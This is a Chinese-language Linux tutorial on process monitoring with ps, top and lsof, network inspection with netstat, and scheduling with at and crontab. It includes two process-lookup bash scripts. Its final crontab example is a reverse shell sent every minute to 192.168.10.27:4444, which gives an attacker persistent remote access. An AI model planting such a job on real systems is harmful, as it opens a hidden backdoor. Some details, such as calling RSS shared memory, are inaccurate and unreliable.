目录
一:监视系统进程(ps 、top)
二:查看网络连接信息 (netstat)
三:文件进程、端口关联(lsof)
四:计划任务管理(at 、crontab)
at
crontab
程序:保存在硬盘、光盘等介质中的可执行代码和数据,静态保存的代码
进程:在cpu及内存中运行的程序代码,动态执行的代码,每个进程可以有多个子进程(线程)
PID : 标识进程的唯一标识
ps:静态查看系统进程
top:动态查看系统进程
pgrep:表示查看指定服务的PID 如: pgrep httpd 查看httpd服务的PID
第一个参数named为named用户,第二个参数表示进程名称为 httpd ,表示查看named用户的httpd进程的PID。与 ps -aux | grep httpd 同样的作用
pstree:以树状结构显示进程的关联信息
进程后台管理
top : 反应系统进程动态信息,默认每3秒更新一次,顶部始终显示系统当前最活跃的进程,此时还可以接受用户的键盘输入向进程发送信号等待
此时输入 u 键,然后输入 root 并按回车键,则此时输出信息显示root所占资源信息
如果输入的是 k,然后输入你要杀死的进程ID,连续回车两次,那个进程就被杀掉了
如果输入的是 M ,表示按照内存占用情况排序
如果输入的是 P ,表示按照CPU占用情况排序
ps : ps是Process Status的缩写,用来列出系统中当前运行的那些进程。ps命令列出的是当前进程的快照,就是执行ps命令这个时刻的进程,与 top 不同的是,ps 是静态查看进程
ps aux :
ps -ef
UID :运行进程的用户
PID :进程的编号
%CPU:进程所占CPU的比重
%MEM: 进程所占内存的比重
VSZ: 虚拟内存
RSS:共享内存
TTY:当前是否有终端登录,?表示没有
STAT:
S:当前状态为睡眠状态
s:当前进程有多个子进程
l:当前进程可能会开启多个子进程
R:当前进程正在运行中
+:表示这个进程在前台运行
Z:表示僵尸进程
<:表示当前进程优先级高
START : 进程开始的时间
Time : 进程运行的时间
COMAND : 进程的命令所在的目录
有关于 ps aux和ps -ef的区别:聊聊 ps aux 和 ps -elf
结果默认是未排好序的,如果想通过cpu使用情况来排序,可以加参数: --sort -pcpu
如果想通过内存来排序,可以加参数: --sort -pmem
如果想通过进程开启时间来排序,可以加参数,--sort=lstart ,从最开始启动的进程排序到最后启动的进程
根据用户来筛选进程: ps -u root
根据进程名筛选: ps -C gnome-shell
根据进程筛选: ps -L 613
显示安全信息,如果想要查看有谁登陆了你的服务器,可以使用 ps -eo pid,user,args
-e显示所有进程信息,-o参数控制输出, pid,user,args显示应用的PID,运行应用的用户和该应用
实时监控进程状态 watch -n 5 ' ps -aux --sort -pmem ' 。意思是每隔5秒按照内存排序查看进程信息
一个根据PID过滤的出当前PID所对应的进程的信息的脚本
#! /bin/bash
# Author:谢公子
# Date:2018-10-10
# Function: 根据用户输入的PID,过滤出该PID所有的信息
read -p "请输入要查询的PID: " P
n=`ps -aux| awk '$2~/^'$P'$/{print $11}'|wc -l`
if [ $n -eq 0 ];then
echo "该PID不存在!!"
exit
fi
echo "--------------------------------"
echo "进程PID: $P"
echo "进程命令:`ps -aux| awk '$2~/^'$P'$/{print $11}'`"
echo "进程所属用户: `ps -aux| awk '$2~/^'$P'$/{print $1}'`"
echo "CPU占用率:`ps -aux| awk '$2~/^'$P'$/{print $3}'`%"
echo "内存占用率:`ps -aux| awk '$2~/^'$P'$/{print $4}'`%"
echo "进程开始运行的时刻:`ps -aux| awk '$2~/^'$P'$/{print $9}'`"
echo "进程运行的时间:`ps -aux| awk '$2~/^'$P'$/{print $10}'`"
echo "进程状态:`ps -aux| awk '$2~/^'$P'$/{print $8}'`"
echo "进程虚拟内存:`ps -aux| awk '$2~/^'$P'$/{print $5}'`"
echo "进程共享内存:`ps -aux| awk '$2~/^'$P'$/{print $6}'`"
echo "--------------------------------"
脚本运行截图,输入PID 即可查看PID所对应的进程信息
一个根据进程名过滤出当前进程所有PID进程的信息
#! /bin/bash
# Author:谢公子
# Date:2018-10-10
# Function: 根据输入的程序的名字过滤出所对应的PID,并显示出详细信息,如果有几个PID,则全部显示
read -p "请输入要查询的进程名:" NAME
N=`ps -aux | grep $NAME | grep -v grep | wc -l` ##统计进程总数
if [ $N -le 0 ];then
echo "该进程名没有运行!"
fi
i=1
while [ $N -gt 0 ]
do
echo "进程PID: `ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $2}'`"
echo "进程命令:`ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $11}'`"
echo "进程所属用户: `ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $1}'`"
echo "CPU占用率:`ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $3}'`%"
echo "内存占用率:`ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $4}'`%"
echo "进程开始运行的时刻:`ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $9}'`"
echo "进程运行的时间:` ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $11}'`"
echo "进程状态:`ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $8}'`"
echo "进程虚拟内存:`ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $5}'`"
echo "进程共享内存:`ps -aux | grep $NAME | grep -v grep | awk 'NR=='$i'{print $0}'| awk '{print $6}'`"
echo "***************************************************************"
let N-- i++
done
脚本运行截图,输入进程名即过滤出该进程名所对应的所有线程的信息
netstat : 该命令用于显示各种网络相关信息,如网络连接,路由白边,接口状态,masquerade 连接,多播成员等
命令的输出有两部分,第一部分是Active Internet connections,称为有源TCP连接,
其中"Recv-Q"和"Send-Q"指的是接收队列和发送队列,这些数字一般都应该是0,如果不是则表示软件包正在队列中堆积。
第二部分是Active UNIX domain sockets,称为有源 Unix 域套接口(和网络套接字一样,但是只能用于本机通信,性能比网络套接字高一倍)。
注:netstat命令默认是不显示 LISTEN 状态的网络连接和 LISTEING 状态的 UNIX 域连接,只有使用带 -a 或者 -l 参数的命令才能显示
命令参数
常用命令
netstat -pantu : 查看计算机和网络中的哪些计算机产生了连接
netstat -pantu | grep 80 : 查看http服务(80端口)是否开启
lsof : (list open files)是一个列出当前系统进程打开文件的工具。在linux环境下,任何事物都以文件的形式存在,通过文件不仅仅可以访问常规数据,还可以访问网络连接和硬件。所以如传输控制协议(TCP)和用户数据报协议(UDP)套接字等,系统在后台都为该应用程序分配了一个文件描述符FD(文件描述符位置 /proc/PID/fd/ ),无论这个文件的本质如何,该文件描述符为应用程序与基础操作系统之间的交互提供了通用接口。因为应用程序打开文件的描述符列表提供了大量关于这个应用程序本身的信息,因此通过lsof工具能够查看这个列表对系统检测以及排错将是很有帮助的
常用命令
lsof -p 699 #显示PID为699的进程打开的所有文件
显示与22端口有关的进程
lsof -i:22 #打开所有与22端口有关的进程
ls -lh /proc/699/exe #显示PID为699的进程的启动程序
cp /proc/699/exe 1 #复制PID为699的进程的启动程序为1
at :一次性计划任务 ,服务脚本 /etc/init.d/atd (rhel6) /usr/lib/systemd/system/atd(rhel7)
设置格式:
结束:ctrl + d
查询 :atq 或 at -l
删除 :atrm 2
查询指定计划任务内容:at -c 2
有关时间的文章:date命令查看时间
crontab:周期性计划任务,按照预先设置的时间周期执行用户指定命令的操作
主要配置文件
编辑计划任务: crontab -e -u 用户名
查看计划任务: crontab -l -u 用户名
删除计划任务: crontab -r -u 用户名
注:如果没有指定用户名,则默认为当前用户
编辑计划任务
有6个参数,分别代表 分、时、天、月、周、要执行的命令 。如果打开的时候没指定用户名,则这里也不需要写用户名,代表当前编辑用户
.---------------- minute (0 - 59)
| .------------- hour (0 - 23)
| | .---------- day of month (1 - 31)
| | | .------- month (1 - 12) OR jan,feb,mar,apr ...
| | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
| | | | |
* * * * * command
*号代表每一 ,比如
*/5 * 15-20 7-8 3-4 command 每五分钟,每一个小时,一个月的15-20号,一年的7-8月,一周的周3-周四 执行命令
这里的command命令可以是一个可执行文件的路径
例:
在/bin/下有一个1.sh的脚本文件, 其内容是 cp /var/log/messages /tmp/log.`date +%F:%H:%M`
意思是备份日志文件到tmp目录,并且以当前的时间命名
然后我们创建一个周期性任务
*/2 0-6 28-30 * * /bin/1.sh
#这个计划任务就是每个月的27-30号的,每天的0-6点,每隔两分钟备份一次日志文件并以当前的时间命名
*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.10.27/4444 0>&1
#每隔一分钟,向192.168.10.27的4444号端口发送shell
相关文件:Linux下磁盘分区、卸载和磁盘配额